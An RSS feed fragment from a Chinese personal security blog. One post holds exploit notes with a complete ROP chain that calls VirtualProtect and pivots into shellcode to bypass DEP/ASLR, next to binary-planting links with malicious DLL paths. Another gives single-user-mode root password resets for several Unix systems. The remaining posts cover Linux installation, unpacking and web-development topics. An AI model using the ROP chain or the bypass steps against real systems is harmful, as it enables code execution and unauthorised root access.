Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><span id="more-1515"></span><!--more-->http://mpc-hc.svn.sourceforge.net/viewvc/mpc-hc/trunk/src/filters/transform/MPCVideoDec/MPCVideoDecFilter.cpp?view=log<br />
// We crash inside this function<br />
// In swscale.c: Function &#8216;simpleCopy&#8217;<br />
// Line: 1961 &#8211; Buffer Overrun<br />
// This might be ffmpeg fault or more likely mpchc is not reinitializing ffmpeg correctly during display change (moving mpchc window from display A to display B)<br />
搞了好久才无意发现是这个。暂时不好利用。待定了。<br />
枉费我在没SYMBOLS的情况下搞了好久，心碎啊，教训教训。。</p>
<p>While this DLL seems interesting, it does not import VirtualAlloc, VirtualProtect, HeapCreate, WriteMemory or even a LoadLibrary, which complicates exploitation. However, the attacker did find and use other functions: </p>
<p>4A84903C CreateFileA                // create the file iso88591<br />
4A849038 CreateFileMappingA    // attrib RWE<br />
4A849030 MapViewOfFile            // load this file in memory with RWE flags<br />
4A849170 memcpy                    // copy the payload</p>
<p>The idea of the attacker was to spray the heap with a ROP pattern, followed by the shellcode. It first creates a file (iso88591) on disk, loads it with RWE attributes, copies the payload in memory and eventually executes the shellcode.</p>
<p>新思路，BYPASS DEP ASLR .</p>
<p>rop = [<br />
	rop_base + 0x1022,		# retn</p>
<p>	# Write lpfOldProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	heap - 0x1000,			# lpfOldProtect -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write flNewProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	0&#215;40,				# flNewProtect -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write dwSize<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	0&#215;60000,			# dwSize -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write lpAddress<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	heap &#038; ~0xfff,			# lpAddress -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write &#038;Pivot<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	rop_base + 0x229a5,		# &#038;pivot -> eax<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn<br />
	rop_base + 0x3ab5e,		# dec esi; retn</p>
<p>	# Write &#038;VirtualProtect<br />
	rop_base + 0x2c283,		# pop eax; retn<br />
	rop_base + 0x1212a4,		# IAT entry for VirtualProtect -> eax<br />
	rop_base + 0x12fda,		# mov eax,DWORD PTR [eax]<br />
	rop_base + 0x1db4f,		# mov [esi],eax; retn</p>
<p>	# Pivot ESP<br />
	rop_base + 0x229a5,		# xchg esi,esp; retn;</p>
<p>	# Jump into shellcode<br />
	rop_base + 0xdace8              # push esp; retn<br />
]<br />
WIN8上的ROP，有点小变化啦。</p>
<p>https://code.google.com/p/address-sanitizer/</p>
<p>貌似最近CHROME用这东东发现不少use-after-free and out-of-bound bugs<br />
标记+1啦～</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2011/11/qqplayer-pict-pnsize-buffer-overflow-win7-dep_aslr-bypass/' rel='bookmark' title='Permanent Link: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS'>QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/what_ever/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>recent life</title>
		<link>http://cq-cser.cn/2011/10/recent-life/</link>
		<comments>http://cq-cser.cn/2011/10/recent-life/#comments</comments>
		<pubDate>Tue, 25 Oct 2011 08:55:36 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1506</guid>
		<description><![CDATA[chrome 待定 http://code.google.com/p/selenium/wiki/JsonWireProtocol http://www.chromium.org/developers/testing/webdriver-for-chrome/chromedriver-internals http://selenium.googlecode.com/svn/trunk/docs/api/java/org/openqa/selenium/chrome/ChromeDriver.html http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/REVISIONS http://src.chromium.org/svn/trunk/ http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/chrome-win32.test/ . binary_planting 系列,GOOD! http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html http://www.binaryplanting.com/guidelinesDevelopers.htm http://www.binaryplanting.com/test.htm this problem also affects the way Windows processes are launched via various functions such as CreateProcess*, ShellExecute*, WinExec, LoadModule, _spawn*p* and _exec*p*. library=c:\temp\malicious.dll library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib derbycon2011 http://www.irongeek.com/i.php?page=videos/derbycon1/tony-huffman-myne-us-when-fuzzers-miss-the-no-hanging-fruit bot funny! http://www.m86security.com/labs/bot_statistics.asp autocomplete stolen http://blog.mindedsecurity.com/2011/10/autocompleteagain.html WEB指纹识别 http://sebug.net/chweb/ peachfuzz http://peachfuzzer.com/TutorialNetworkServer 另 https://media.blackhat.com/bh-us-11/Cerrudo/BH_US_11_Cerrudo_Vulnerability_Hunting_Windows_Slides.pdf 此文系慢慢看 No related [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p><a href="http://cq-cser.cn/wp-content/uploads/2011/10/12.png"><img src="http://cq-cser.cn/wp-content/uploads/2011/10/12.png" alt="" title="1" width="721" height="455" class="aligncenter size-full wp-image-1512" /></a><br />
<span id="more-1506"></span>chrome 待定</p>
<p>http://code.google.com/p/selenium/wiki/JsonWireProtocol</p>
<p>http://www.chromium.org/developers/testing/webdriver-for-chrome/chromedriver-internals</p>
<p>http://selenium.googlecode.com/svn/trunk/docs/api/java/org/openqa/selenium/chrome/ChromeDriver.html</p>
<p>http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/REVISIONS</p>
<p>http://src.chromium.org/svn/trunk/</p>
<p>http://build.chromium.org/f/chromium/snapshots/Win_Webkit_Latest/4181/chrome-win32.test/ .</p>
<p>binary_planting 系列,GOOD!</p>
<p>http://blog.acrossecurity.com/2011/10/google-chrome-pkcs11txt-file-planting.html</p>
<p>http://www.binaryplanting.com/guidelinesDevelopers.htm</p>
<p>http://www.binaryplanting.com/test.htm</p>
<p>this problem also affects the way Windows processes are launched via various functions<br />
such as CreateProcess*, ShellExecute*, WinExec, LoadModule, _spawn*p* and _exec*p*.<br />
library=c:\temp\malicious.dll<br />
library=\\www.binaryplanting.com\demo\chrome_pkcs11Planting\malicious.lib</p>
<p>derbycon2011</p>
<p>http://www.irongeek.com/i.php?page=videos/derbycon1/tony-huffman-myne-us-when-fuzzers-miss-the-no-hanging-fruit</p>
<p>bot funny!</p>
<p>http://www.m86security.com/labs/bot_statistics.asp</p>
<p>autocomplete stolen</p>
<p>http://blog.mindedsecurity.com/2011/10/autocompleteagain.html</p>
<p>WEB指纹识别</p>
<p>http://sebug.net/chweb/</p>
<p>peachfuzz</p>
<p>http://peachfuzzer.com/TutorialNetworkServer</p>
<p>另</p>
<p>https://media.blackhat.com/bh-us-11/Cerrudo/BH_US_11_Cerrudo_Vulnerability_Hunting_Windows_Slides.pdf</p>
<p>此文系慢慢看</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/10/recent-life/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LINUX本地密码遗忘</title>
		<link>http://cq-cser.cn/2011/01/linux-passwd/</link>
		<comments>http://cq-cser.cn/2011/01/linux-passwd/#comments</comments>
		<pubDate>Sat, 22 Jan 2011 13:14:04 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[linux/unix]]></category>
		<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1421</guid>
		<description><![CDATA[一）RedHat/CentOS/Fedora 系统密码破解 　　1.在grub选项菜单按E进入编辑模式。 　　2.编辑kernel 那行最后加上S（或者Single）。 　　3.按B，启动到single-user mode。 　　4.进入后执行下列命令： 　　# mount -t proc proc /proc 　　# mount -o remount,rw / 　　#passwd 　　#sync 　　#reboot 　　（二）Debian linux 系统密码破解 　　1.在grub选项菜单‘Debian GNU/Linux,…(recovery mode)’，按e进入编辑模式。 　　2.编辑kernel那行最后面的 ro single 改成 rw single init=/bin/bash，按b执行重启。 　　3.进入后执行下列命令： 　　root@(none)#mount -a 　　root@(none)#passwd root 　　root@(none)#reboot 　　（三）Freebsd 系统密码破解 　　1.开机进入引导菜单。 　　2.选择每项（按4）进入单用户模式。 　　3.进入之后输入下列命令： 　　root@#mount -a 　　root@#fsck -y 　　root@#passwd（修改密码命令） 　　root@#root（要破解密码的用户名） 　　Enter new unix [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/cvs%e6%9c%8d%e5%8a%a1%e5%9c%a8linux%e4%b8%8b%e7%9a%84%e5%ae%89%e8%a3%85%e4%b8%8e%e9%85%8d%e7%bd%ae/' rel='bookmark' title='Permanent Link: cvs服务在linux下的安装与配置'>cvs服务在linux下的安装与配置</a></li>
<li><a href='http://cq-cser.cn/2010/10/pxe%e7%bd%91%e7%bb%9c%e5%ae%89%e8%a3%85linux/' rel='bookmark' title='Permanent Link: PXE网络安装LINUX'>PXE网络安装LINUX</a></li>
<li><a href='http://cq-cser.cn/2009/11/vps-%e5%bf%ab%e9%80%9f%e5%ae%89%e8%a3%85-linuxnginxmysqlphp-%e7%8e%af%e5%a2%83%e3%80%90%e8%bd%ac%e3%80%91/' rel='bookmark' title='Permanent Link: VPS 快速安装 Linux+Nginx+MySQL+PHP 环境【转】'>VPS 快速安装 Linux+Nginx+MySQL+PHP 环境【转】</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>一）RedHat/CentOS/Fedora 系统密码破解<br />
　　1.在grub选项菜单按E进入编辑模式。<br />
　　2.编辑kernel 那行最后加上S（或者Single）。<br />
　　3.按B，启动到single-user mode。<br />
　　4.进入后执行下列命令：<br />
　　# mount -t proc proc /proc<br />
　　# mount -o remount,rw /<br />
　　#passwd<br />
　　#sync<br />
　　#reboot<br />
　　（二）Debian linux 系统密码破解<br />
　　1.在grub选项菜单‘Debian GNU/Linux,…(recovery mode)’，按e进入编辑模式。<br />
　　2.编辑kernel那行最后面的 ro single 改成 rw single init=/bin/bash，按b执行重启。<br />
　　3.进入后执行下列命令：<br />
　　root@(none)#mount -a<br />
　　root@(none)#passwd root<br />
　　root@(none)#reboot<br />
　　（三）Freebsd 系统密码破解<br />
　　1.开机进入引导菜单。<br />
　　2.选择每项（按4）进入单用户模式。<br />
　　3.进入之后输入下列命令：<br />
　　root@#mount -a<br />
　　root@#fsck -y<br />
　　root@#passwd（修改密码命令）<br />
　　root@#root（要破解密码的用户名）<br />
　　Enter new unix password:<br />
　　root@#init 6 （重启）<br />
　　（四）Solaris 系统密码破解<br />
　　1.在grub选项菜中选择solaris failasfe 项。<br />
　　2.系统提示Do you wish to have it mounted read-write on /a ?[y,n,?] 选择y。<br />
　　3.就进入单用户模式。<br />
　　4.输入下列命令：passwd。<br />
　　root@#init 6 （重启）<br />
　　（五）NetBsd 系统密码破解<br />
　　1.开机：当出现提示符号并开始倒数五秒时， 键入以下指令：<br />
　　&gt; boot -s （进入单用户模式命令）<br />
　　2.在以下的提示符号中：<br />
　　Enter pathname of shell or RETURN for sh:<br />
　　按下 Enter。<br />
　　3.键入以下指令：<br />
　　# mount -a<br />
　　# fsck -y<br />
　　4.使用 passwd 更改 root 的密码。<br />
　　5.使用 exit 指令进入多人模式。<br />
　　（六）SUSE 系统密码破解<br />
　　1.重新启动机器，在出现grub引导界面后，在启动linux的选项里加上init=/bin/bash，通过给内核传递init=/bin/bash参数使得OS在运行login程序之前运行bash，出现命令行。<br />
　　2.稍等片刻出现(none)#:命令行。<br />
　　3.这时输入mount -n / -o remount,rw 表示将根文件系统重新mount为可读写，有了读写权限后就可以通过passwd命令修改密码了。<br />
　　4.这时输入passwd命令就可以重置密码了。<br />
　　5.修改完成后记得用mount -n / -o remount,ro将根文件系统置为原来的状态</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/cvs%e6%9c%8d%e5%8a%a1%e5%9c%a8linux%e4%b8%8b%e7%9a%84%e5%ae%89%e8%a3%85%e4%b8%8e%e9%85%8d%e7%bd%ae/' rel='bookmark' title='Permanent Link: cvs服务在linux下的安装与配置'>cvs服务在linux下的安装与配置</a></li>
<li><a href='http://cq-cser.cn/2010/10/pxe%e7%bd%91%e7%bb%9c%e5%ae%89%e8%a3%85linux/' rel='bookmark' title='Permanent Link: PXE网络安装LINUX'>PXE网络安装LINUX</a></li>
<li><a href='http://cq-cser.cn/2009/11/vps-%e5%bf%ab%e9%80%9f%e5%ae%89%e8%a3%85-linuxnginxmysqlphp-%e7%8e%af%e5%a2%83%e3%80%90%e8%bd%ac%e3%80%91/' rel='bookmark' title='Permanent Link: VPS 快速安装 Linux+Nginx+MySQL+PHP 环境【转】'>VPS 快速安装 Linux+Nginx+MySQL+PHP 环境【转】</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/01/linux-passwd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PXE网络安装LINUX</title>
		<link>http://cq-cser.cn/2010/10/pxe%e7%bd%91%e7%bb%9c%e5%ae%89%e8%a3%85linux/</link>
		<comments>http://cq-cser.cn/2010/10/pxe%e7%bd%91%e7%bb%9c%e5%ae%89%e8%a3%85linux/#comments</comments>
		<pubDate>Mon, 04 Oct 2010 12:34:57 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[linux/unix]]></category>
		<category><![CDATA[debian]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1370</guid>
		<description><![CDATA[http://pxe.ustc.edu.cn/install-tutorial.html#grub_direct_boot 传几张图啦 然后网络怎么就连接不上了，可能和路由网关之类有关系吧，试了什么代理都不行，于是用下面的直接下载安装，50多MB反而快些 http://www.debian.org/distrib/netinst 我用的是这个 http://cdimage.debian.org/debian-cd/5.0.6/i386/iso-cd/debian-506-i386-businesscard.iso 等一切结束后，啊，令人兴奋的DEBIAN之旅开始啦 Related posts:{转}VPS上安装LAMP步骤 VNC IN DEBIAN debian下安装GCC


Related posts:<ol><li><a href='http://cq-cser.cn/2009/12/%e8%bd%acvps%e4%b8%8a%e5%ae%89%e8%a3%85lamp%e6%ad%a5%e9%aa%a4/' rel='bookmark' title='Permanent Link: {转}VPS上安装LAMP步骤'>{转}VPS上安装LAMP步骤</a></li>
<li><a href='http://cq-cser.cn/2010/10/vnc-in-debian/' rel='bookmark' title='Permanent Link: VNC IN DEBIAN'>VNC IN DEBIAN</a></li>
<li><a href='http://cq-cser.cn/2010/10/debian%e4%b8%8b%e5%ae%89%e8%a3%85gcc/' rel='bookmark' title='Permanent Link: debian下安装GCC'>debian下安装GCC</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://pxe.ustc.edu.cn/install-tutorial.html#grub_direct_boot">http://pxe.ustc.edu.cn/install-tutorial.html#grub_direct_boot</a></p>
<p>传几张图啦</p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/10/1.png"><img class="alignnone size-full wp-image-1373" title="1" src="http://cq-cser.cn/wp-content/uploads/2010/10/1.png" alt="" width="665" height="400" /></a><span id="more-1370"></span></p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/10/3.png"><img class="alignnone size-full wp-image-1374" title="3" src="http://cq-cser.cn/wp-content/uploads/2010/10/3.png" alt="" width="649" height="497" /></a></p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/10/4.png"><img class="alignnone size-full wp-image-1375" title="4" src="http://cq-cser.cn/wp-content/uploads/2010/10/4.png" alt="" width="664" height="437" /></a></p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/10/5.png"><img class="alignnone size-full wp-image-1376" title="5" src="http://cq-cser.cn/wp-content/uploads/2010/10/5.png" alt="" width="661" height="433" /></a></p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/10/6.png"><img class="alignnone size-full wp-image-1377" title="6" src="http://cq-cser.cn/wp-content/uploads/2010/10/6.png" alt="" width="661" height="398" /></a></p>
<p>然后网络怎么就连接不上了，可能和路由网关之类有关系吧，试了什么代理都不行，于是用下面的直接下载安装，50多MB反而快些</p>
<p><a href="http://www.debian.org/distrib/netinst">http://www.debian.org/distrib/netinst</a></p>
<p>我用的是这个</p>
<p><a href="http://cdimage.debian.org/debian-cd/5.0.6/i386/iso-cd/debian-506-i386-businesscard.iso">http://cdimage.debian.org/debian-cd/5.0.6/i386/iso-cd/debian-506-i386-businesscard.iso</a></p>
<p>等一切结束后，啊，令人兴奋的DEBIAN之旅开始啦</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2009/12/%e8%bd%acvps%e4%b8%8a%e5%ae%89%e8%a3%85lamp%e6%ad%a5%e9%aa%a4/' rel='bookmark' title='Permanent Link: {转}VPS上安装LAMP步骤'>{转}VPS上安装LAMP步骤</a></li>
<li><a href='http://cq-cser.cn/2010/10/vnc-in-debian/' rel='bookmark' title='Permanent Link: VNC IN DEBIAN'>VNC IN DEBIAN</a></li>
<li><a href='http://cq-cser.cn/2010/10/debian%e4%b8%8b%e5%ae%89%e8%a3%85gcc/' rel='bookmark' title='Permanent Link: debian下安装GCC'>debian下安装GCC</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2010/10/pxe%e7%bd%91%e7%bb%9c%e5%ae%89%e8%a3%85linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>10大最吃香的网站开发技术。</title>
		<link>http://cq-cser.cn/2010/10/10%e5%a4%a7%e6%9c%80%e5%90%83%e9%a6%99%e7%9a%84%e7%bd%91%e7%ab%99%e5%bc%80%e5%8f%91%e6%8a%80%e6%9c%af%e3%80%82/</link>
		<comments>http://cq-cser.cn/2010/10/10%e5%a4%a7%e6%9c%80%e5%90%83%e9%a6%99%e7%9a%84%e7%bd%91%e7%ab%99%e5%bc%80%e5%8f%91%e6%8a%80%e6%9c%af%e3%80%82/#comments</comments>
		<pubDate>Sat, 02 Oct 2010 23:10:35 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[IT]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1346</guid>
		<description><![CDATA[原文：http://www.heimian.com/post/824.html 当今网站开发领域很繁荣，因为不论是现在或者将来，网络必定是人们日常生活中不可缺少的组成部分。NETTUTS上列出10大最吃香的网站开发技术。 1. Framework knowledge (架构知识)      架构是大型网站开发的重要部分。开发者已经从Rails, Django等公司提供的网站架构工具中收益，因为架构工具可以帮助完成那些需要一定编程知识的重复性的任务。如果你拥有领先的架构技术(像Rails, Django, CakePHP, Symfony等)，你的择业面将非常广阔。 2. Widget Development (窗体小部件开发) 　窗体小部件(Widgets)是一个嵌入网页的迷你应用程序，通常也可以下载到Windows或者Mac桌面下运行。它让数据变得便与携带而且更具交互性。比较出名的像Yahoo Widgets和AOL Music Widgets。窗体小部件开发除了需要掌握网络应用程序开发所需的语言知识，还需要精通Javascript和Flash知识。 3. Custom CMS themes (内容管理系统主题定制) 　如今越来越多人开始使用CMS(内容管理系统，例如WordPress和Drupal)来构建他们的网站。可以想象不可能大家都用CMS提供的默认主题，为了让自己的CMS网站在外观设计上独树一帜，就需要一些专门给CMS开发主题的技术人员。 4. CMS Customizations and plugin development (内容管理系统的定制以及插件开发) 　同样随着CMS的流行，对CMS的功能定制以及插件开发的需求也越来越大。 5. PSD to XHTML services (PSD转换XHTML的服务） 　在建站中，许多公司是先用Photoshop设计好网站的外观原图，然后再转换成XHTML。这需要很强的CSS/HTML知识。 6. Javascript Plugin creation(Javascript的插件开发) 　Javascript的Framework非常流行，因为它使Javascript的代码开发变得简单。就比如说现在流行的Javascript Framework &#8211; jQuery，如果你在它的基础上开发优秀的插件，那么你的插件也会跟着流行起来。 7. Facebook/MySpace applications (Facebook/MySpace 应用程序开发) 　Facebook/MySpace两大社交网站在美国红遍半边天。给他们开发应用程序，不用说一定是相当热门的。 [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2009/11/google-%e6%8e%92%e5%90%8d%e4%b8%ad%e7%9a%8410%e4%b8%aa%e6%9c%80%e8%91%97%e5%90%8d%e7%9a%84javascript%e5%ba%93/' rel='bookmark' title='Permanent Link: Google 排名中的10个最著名的JavaScript库'>Google 排名中的10个最著名的JavaScript库</a></li>
<li><a href='http://cq-cser.cn/2010/02/jgrowl/' rel='bookmark' title='Permanent Link: jGrowl'>jGrowl</a></li>
<li><a href='http://cq-cser.cn/2009/12/the-best-jquery-plugins-of-2009/' rel='bookmark' title='Permanent Link: The Best jQuery Plugins of 2009'>The Best jQuery Plugins of 2009</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>原文：<a href="http://www.heimian.com/post/824.html">http://www.heimian.com/post/824.html</a></p>
<p>当今网站开发领域很繁荣，因为不论是现在或者将来，网络必定是人们日常生活中不可缺少的组成部分。NETTUTS上列出10大最吃香的网站开发技术。<span id="more-1346"></span></p>
<p>1. Framework knowledge (架构知识)</p>
<p>     架构是大型网站开发的重要部分。开发者已经从Rails, Django等公司提供的网站架构工具中收益，因为架构工具可以帮助完成那些需要一定编程知识的重复性的任务。如果你拥有领先的架构技术(像Rails, Django, CakePHP, Symfony等)，你的择业面将非常广阔。</p>
<p>2. Widget Development (窗体小部件开发)</p>
<p>　窗体小部件(Widgets)是一个嵌入网页的迷你应用程序，通常也可以下载到Windows或者Mac桌面下运行。它让数据变得便与携带而且更具交互性。比较出名的像Yahoo Widgets和AOL Music Widgets。窗体小部件开发除了需要掌握网络应用程序开发所需的语言知识，还需要精通Javascript和Flash知识。</p>
<p>3. Custom CMS themes (内容管理系统主题定制)</p>
<p>　如今越来越多人开始使用CMS(内容管理系统，例如WordPress和Drupal)来构建他们的网站。可以想象不可能大家都用CMS提供的默认主题，为了让自己的CMS网站在外观设计上独树一帜，就需要一些专门给CMS开发主题的技术人员。</p>
<p>4. CMS Customizations and plugin development (内容管理系统的定制以及插件开发)</p>
<p>　同样随着CMS的流行，对CMS的功能定制以及插件开发的需求也越来越大。</p>
<p>5. PSD to XHTML services (PSD转换XHTML的服务）</p>
<p>　在建站中，许多公司是先用Photoshop设计好网站的外观原图，然后再转换成XHTML。这需要很强的CSS/HTML知识。</p>
<p>6. Javascript Plugin creation(Javascript的插件开发)</p>
<p>　Javascript的Framework非常流行，因为它使Javascript的代码开发变得简单。就比如说现在流行的Javascript Framework &#8211; jQuery，如果你在它的基础上开发优秀的插件，那么你的插件也会跟着流行起来。</p>
<p>7. Facebook/MySpace applications (Facebook/MySpace 应用程序开发)</p>
<p>　Facebook/MySpace两大社交网站在美国红遍半边天。给他们开发应用程序，不用说一定是相当热门的。</p>
<p>8. iPhoneapplications (iPhone 应用程序开发)</p>
<p>　同样给iPhone开发应用程序，也一直都可以被大量下载，因此也是很赚钱的活。</p>
<p>9. E-commerce integration (电子商务一体化)</p>
<p>　如今电子商务网站(像Ebay，Amazon)与在线银行服务系统(像Paypal和Google Checkout的)之间的配合越来越紧密，因此电子商务交易平台的开发也是相当有前途的。</p>
<p>10. Flash and Actionscript Knowledge (Flash和Actionscript知识)</p>
<p>　越来越多的公司采用Flash来制作自己的网站、展现自己的产品，因为精美的动画总是容易吸引人们的眼球。因此Flash动画技术也必然迅速发展</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2009/11/google-%e6%8e%92%e5%90%8d%e4%b8%ad%e7%9a%8410%e4%b8%aa%e6%9c%80%e8%91%97%e5%90%8d%e7%9a%84javascript%e5%ba%93/' rel='bookmark' title='Permanent Link: Google 排名中的10个最著名的JavaScript库'>Google 排名中的10个最著名的JavaScript库</a></li>
<li><a href='http://cq-cser.cn/2010/02/jgrowl/' rel='bookmark' title='Permanent Link: jGrowl'>jGrowl</a></li>
<li><a href='http://cq-cser.cn/2009/12/the-best-jquery-plugins-of-2009/' rel='bookmark' title='Permanent Link: The Best jQuery Plugins of 2009'>The Best jQuery Plugins of 2009</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2010/10/10%e5%a4%a7%e6%9c%80%e5%90%83%e9%a6%99%e7%9a%84%e7%bd%91%e7%ab%99%e5%bc%80%e5%8f%91%e6%8a%80%e6%9c%af%e3%80%82/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>关于esp定律</title>
		<link>http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/</link>
		<comments>http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/#comments</comments>
		<pubDate>Thu, 30 Sep 2010 07:13:02 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>
		<category><![CDATA[其他]]></category>
		<category><![CDATA[=]]></category>
		<category><![CDATA[逆向工程]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1355</guid>
		<description><![CDATA[听说了n多关于esp定律的。没实践过。一直不大明白。 关于esp定律。 od载入后如下： 00401000 Q&#62;  60                    pushad 00401001     06                    push es 00401002     FC                    cld 00401003     1E                    push ds 在f8过了push es后。 esp=0012ffa0 在命令行下 dd 0012ffa0 然后对0012ffa0下硬件写入(还是访问？这里不是很清楚)dword断点。 然后f9运行。f8几步看见出口关键字popad 然后一个jump跳到程序oep-== No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<p>听说了n多关于esp定律的。没实践过。一直不大明白。<span id="more-1355"></span></p>
<p>关于esp定律。</p>
<p>od载入后如下：</p>
<p>00401000 Q&gt;  60                    pushad<br />
00401001     06                    push es<br />
00401002     FC                    cld<br />
00401003     1E                    push ds</p>
<p>在f8过了push es后。</p>
<p>esp=0012ffa0</p>
<p>在命令行下 dd 0012ffa0</p>
<p>然后对0012ffa0下硬件写入(还是访问？这里不是很清楚)dword断点。</p>
<p>然后f9运行。f8几步看见出口关键字popad</p>
<p>然后一个jump跳到程序oep-==</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virus.Win32.Parite.a 专杀下载</title>
		<link>http://cq-cser.cn/2010/09/virus-win32-parite-a-%e7%97%85%e6%af%92%e4%b8%93%e6%9d%80%e5%b7%a5%e5%85%b7%e4%b8%8b%e8%bd%bd/</link>
		<comments>http://cq-cser.cn/2010/09/virus-win32-parite-a-%e7%97%85%e6%af%92%e4%b8%93%e6%9d%80%e5%b7%a5%e5%85%b7%e4%b8%8b%e8%bd%bd/#comments</comments>
		<pubDate>Wed, 08 Sep 2010 17:36:12 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1343</guid>
		<description><![CDATA[真折腾人。 killparite 下载此Virus.Win32.Parite.a 病毒专杀工具 No related posts.


No related posts.]]></description>
			<content:encoded><![CDATA[<p>真折腾人。</p>
<p><a href="http://cq-cser.cn/wp-content/uploads/2010/09/killparite.zip">killparite</a></p>
<p><a href="attachments/month_0911/antiparite-en.zip" target="_blank">下载此Virus.Win32.Parite.a 病毒专杀工具</a></p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2010/09/virus-win32-parite-a-%e7%97%85%e6%af%92%e4%b8%93%e6%9d%80%e5%b7%a5%e5%85%b7%e4%b8%8b%e8%bd%bd/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>

